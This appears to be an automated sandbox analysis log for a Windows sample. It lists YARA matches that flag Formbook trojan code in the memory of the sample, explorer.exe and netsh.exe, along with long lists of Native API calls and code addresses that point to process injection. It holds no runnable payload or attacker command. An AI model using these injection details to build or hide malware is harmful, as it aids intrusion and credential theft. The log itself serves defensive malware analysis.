          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4157684455.000000000F8A5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_772cc62d; Author: unknown
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 6740, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 7164, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: Process Memory Space: netsh.exe PID: 396, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2b55708.2.raw.unpack, SizeParameters.cs; Large array initialization: array initializer size 15142
          Source: 0.2.8tvMmyxveyzFcnJ.exe.5610000.13.raw.unpack, SizeParameters.cs; Large array initialization: array initializer size 15142
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A360 NtCreateFile, 3_2_0041A360
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A410 NtReadFile, 3_2_0041A410
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A490 NtClose, 3_2_0041A490
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A540 NtAllocateVirtualMemory, 3_2_0041A540
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A35F NtCreateFile, 3_2_0041A35F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A40A NtReadFile, 3_2_0041A40A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A48A NtClose, 3_2_0041A48A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_0041A53A NtAllocateVirtualMemory, 3_2_0041A53A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2B60 NtClose, LdrInitializeThunk, 3_2_013F2B60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 3_2_013F2BF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2AD0 NtReadFile, LdrInitializeThunk, 3_2_013F2AD0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2D30 NtUnmapViewOfSection, LdrInitializeThunk, 3_2_013F2D30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2D10 NtMapViewOfSection, LdrInitializeThunk, 3_2_013F2D10
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2DF0 NtQuerySystemInformation, LdrInitializeThunk, 3_2_013F2DF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2DD0 NtDelayExecution, LdrInitializeThunk, 3_2_013F2DD0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2C70 NtFreeVirtualMemory, LdrInitializeThunk, 3_2_013F2C70
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2CA0 NtQueryInformationToken, LdrInitializeThunk, 3_2_013F2CA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2F30 NtCreateSection, LdrInitializeThunk, 3_2_013F2F30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2FB0 NtResumeThread, LdrInitializeThunk, 3_2_013F2FB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2F90 NtProtectVirtualMemory, LdrInitializeThunk, 3_2_013F2F90
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2FE0 NtCreateFile, LdrInitializeThunk, 3_2_013F2FE0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2EA0 NtAdjustPrivilegesToken, LdrInitializeThunk, 3_2_013F2EA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2E80 NtReadVirtualMemory, LdrInitializeThunk, 3_2_013F2E80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F3010 NtOpenDirectoryObject, 3_2_013F3010
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F3090 NtSetValueKey, 3_2_013F3090
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F4340 NtSetContextThread, 3_2_013F4340
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F35C0 NtCreateMutant, 3_2_013F35C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F4650 NtSuspendThread, 3_2_013F4650
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F39B0 NtGetContextThread, 3_2_013F39B0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2BA0 NtEnumerateValueKey, 3_2_013F2BA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2B80 NtQueryInformationFile, 3_2_013F2B80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2BE0 NtQueryValueKey, 3_2_013F2BE0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2AB0 NtWaitForSingleObject, 3_2_013F2AB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2AF0 NtWriteFile, 3_2_013F2AF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F3D10 NtOpenProcessToken, 3_2_013F3D10
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2D00 NtSetInformationFile, 3_2_013F2D00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F3D70 NtOpenThread, 3_2_013F3D70
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2DB0 NtEnumerateKey, 3_2_013F2DB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2C00 NtQueryInformationProcess, 3_2_013F2C00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2C60 NtCreateKey, 3_2_013F2C60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2CF0 NtOpenProcess, 3_2_013F2CF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2CC0 NtQueryVirtualMemory, 3_2_013F2CC0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2F60 NtCreateProcessEx, 3_2_013F2F60
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2FA0 NtQuerySection, 3_2_013F2FA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2E30 NtWriteVirtualMemory, 3_2_013F2E30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe; Code function: 3_2_013F2EE0 NtQueueApcThread, 3_2_013F2EE0
          Source: C:\Windows\explorer.exe; Code function: 4_2_0F88EE12 NtProtectVirtualMemory, 4_2_0F88EE12
          Source: C:\Windows\explorer.exe; Code function: 4_2_0F88D232 NtCreateFile, 4_2_0F88D232
          Source: C:\Windows\explorer.exe; Code function: 4_2_0F88EE0A NtProtectVirtualMemory, 4_2_0F88EE0A
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92AD0 NtReadFile, LdrInitializeThunk, 6_2_00D92AD0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92B60 NtClose, LdrInitializeThunk, 6_2_00D92B60
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92CA0 NtQueryInformationToken, LdrInitializeThunk, 6_2_00D92CA0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92C70 NtFreeVirtualMemory, LdrInitializeThunk, 6_2_00D92C70
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92C60 NtCreateKey, LdrInitializeThunk, 6_2_00D92C60
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92DD0 NtDelayExecution, LdrInitializeThunk, 6_2_00D92DD0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92DF0 NtQuerySystemInformation, LdrInitializeThunk, 6_2_00D92DF0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92D10 NtMapViewOfSection, LdrInitializeThunk, 6_2_00D92D10
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92EA0 NtAdjustPrivilegesToken, LdrInitializeThunk, 6_2_00D92EA0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92FE0 NtCreateFile, LdrInitializeThunk, 6_2_00D92FE0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92F30 NtCreateSection, LdrInitializeThunk, 6_2_00D92F30
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D935C0 NtCreateMutant, LdrInitializeThunk, 6_2_00D935C0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D94340 NtSetContextThread, 6_2_00D94340
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D94650 NtSuspendThread, 6_2_00D94650
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92AF0 NtWriteFile, 6_2_00D92AF0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92AB0 NtWaitForSingleObject, 6_2_00D92AB0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92BF0 NtAllocateVirtualMemory, 6_2_00D92BF0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92BE0 NtQueryValueKey, 6_2_00D92BE0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92B80 NtQueryInformationFile, 6_2_00D92B80
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92BA0 NtEnumerateValueKey, 6_2_00D92BA0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92CC0 NtQueryVirtualMemory, 6_2_00D92CC0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92CF0 NtOpenProcess, 6_2_00D92CF0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92C00 NtQueryInformationProcess, 6_2_00D92C00
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92DB0 NtEnumerateKey, 6_2_00D92DB0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92D00 NtSetInformationFile, 6_2_00D92D00
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92D30 NtUnmapViewOfSection, 6_2_00D92D30
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92EE0 NtQueueApcThread, 6_2_00D92EE0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92E80 NtReadVirtualMemory, 6_2_00D92E80
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92E30 NtWriteVirtualMemory, 6_2_00D92E30
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92F90 NtProtectVirtualMemory, 6_2_00D92F90
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92FB0 NtResumeThread, 6_2_00D92FB0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92FA0 NtQuerySection, 6_2_00D92FA0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D92F60 NtCreateProcessEx, 6_2_00D92F60
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D93090 NtSetValueKey, 6_2_00D93090
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D93010 NtOpenDirectoryObject, 6_2_00D93010
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D939B0 NtGetContextThread, 6_2_00D939B0
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D93D70 NtOpenThread, 6_2_00D93D70
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00D93D10 NtOpenProcessToken, 6_2_00D93D10
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_0041A360 NtCreateFile, 6_2_0041A360
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_0041A410 NtReadFile, 6_2_0041A410
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_0041A490 NtClose, 6_2_0041A490
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_0041A35F NtCreateFile, 6_2_0041A35F
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_0041A40A NtReadFile, 6_2_0041A40A
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_0041A48A NtClose, 6_2_0041A48A
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00BBA036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, RtlQueueApcWow64Thread, NtResumeThread, 6_2_00BBA036
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00BB9BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose, 6_2_00BB9BAF
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00BBA042 NtQueryInformationProcess, 6_2_00BBA042
          Source: C:\Windows\SysWOW64\netsh.exe; Code function: 6_2_00BB9BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, 6_2_00BB9BB2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0148A9A63_2_0148A9A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0142D8003_2_0142D800
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CA8403_2_013CA840
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C28403_2_013C2840
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A68B83_2_013A68B8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE8F03_2_013EE8F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C38E03_2_013C38E0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147AB403_2_0147AB40
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FB763_2_0147FB76
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01476BD73_2_01476BD7
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01435BF03_2_01435BF0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DFB803_2_013DFB80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013FDBF93_2_013FDBF9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01477A463_2_01477A46
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FA493_2_0147FA49
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01433A6C3_2_01433A6C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146DAC63_2_0146DAC6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BEA803_2_013BEA80
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01405AA03_2_01405AA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145DAAC3_2_0145DAAC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01471D5A3_2_01471D5A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01477D733_2_01477D73
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CAD003_2_013CAD00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C3D403_2_013C3D40
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D8DBF3_2_013D8DBF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BADE03_2_013BADE0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DFDC03_2_013DFDC0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0C003_2_013C0C00
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01439C323_2_01439C32
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FCF23_2_0147FCF2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B0CF23_2_013B0CF2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460CB53_2_01460CB5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01434F403_2_01434F40
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E0F303_2_013E0F30
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FF093_2_0147FF09
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01402F283_2_01402F28
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C1F923_2_013C1F92
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143EFA03_2_0143EFA0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B2FC83_2_013B2FC8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147FFB13_2_0147FFB1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147EE263_2_0147EE26
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C0E593_2_013C0E59
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C9EB03_2_013C9EB0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147EEDB3_2_0147EEDB
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D2E903_2_013D2E90
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147CE933_2_0147CE93
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38FB304_2_0F38FB30
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38FB324_2_0F38FB32
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3952324_2_0F395232
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3929124_2_0F392912
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38CD024_2_0F38CD02
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3985CD4_2_0F3985CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0F3940364_2_0F394036
          Source: C:\Windows\explorer.exeCode function: 4_2_0F38B0824_2_0F38B082
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88D2324_2_0F88D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0F8905CD4_2_0F8905CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0F884D024_2_0F884D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88A9124_2_0F88A912
          Source: C:\Windows\explorer.exeCode function: 4_2_0F887B304_2_0F887B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0F887B324_2_0F887B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0F8830824_2_0F883082
          Source: C:\Windows\explorer.exeCode function: 4_2_0F88C0364_2_0F88C036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DF20006_2_00DF2000
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E181CC6_2_00E181CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E141A26_2_00E141A2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E201AA6_2_00E201AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DE81586_2_00DE8158
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFA1186_2_00DFA118
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D501006_2_00D50100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DE02C06_2_00DE02C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E002746_2_00E00274
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E203E66_2_00E203E6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6E3F06_2_00D6E3F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1A3526_2_00E1A352
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E0E4F66_2_00E0E4F6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E124466_2_00E12446
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E044206_2_00E04420
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E205916_2_00E20591
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D605356_2_00D60535
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7C6E06_2_00D7C6E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D5C7C06_2_00D5C7C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D847506_2_00D84750
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D607706_2_00D60770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D8E8F06_2_00D8E8F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D468B86_2_00D468B8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D628406_2_00D62840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6A8406_2_00D6A840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E2A9A66_2_00E2A9A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D629A06_2_00D629A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D769626_2_00D76962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D5EA806_2_00D5EA80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E16BD76_2_00E16BD7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1AB406_2_00E1AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D50CF26_2_00D50CF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E00CB56_2_00E00CB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D60C006_2_00D60C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D5ADE06_2_00D5ADE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D78DBF6_2_00D78DBF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFCD1F6_2_00DFCD1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6AD006_2_00D6AD00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1EEDB6_2_00E1EEDB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D72E906_2_00D72E90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1CE936_2_00E1CE93
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D60E596_2_00D60E59
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1EE266_2_00E1EE26
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D52FC86_2_00D52FC8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DDEFA06_2_00DDEFA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD4F406_2_00DD4F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E02F306_2_00E02F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D80F306_2_00D80F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA2F286_2_00DA2F28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1F0E06_2_00E1F0E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E170E96_2_00E170E9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D670C06_2_00D670C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E0F0CC6_2_00E0F0CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D6B1B06_2_00D6B1B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E2B16B6_2_00E2B16B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D4F1726_2_00D4F172
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D9516C6_2_00D9516C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E012ED6_2_00E012ED
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7B2C06_2_00D7B2C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7D2F06_2_00D7D2F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D652A06_2_00D652A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA739A6_2_00DA739A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D4D34C6_2_00D4D34C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1132D6_2_00E1132D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D514606_2_00D51460
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1F43F6_2_00E1F43F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E295C36_2_00E295C3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFD5B06_2_00DFD5B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E175716_2_00E17571
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E116CC6_2_00E116CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA56306_2_00DA5630
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1F7B06_2_00E1F7B0
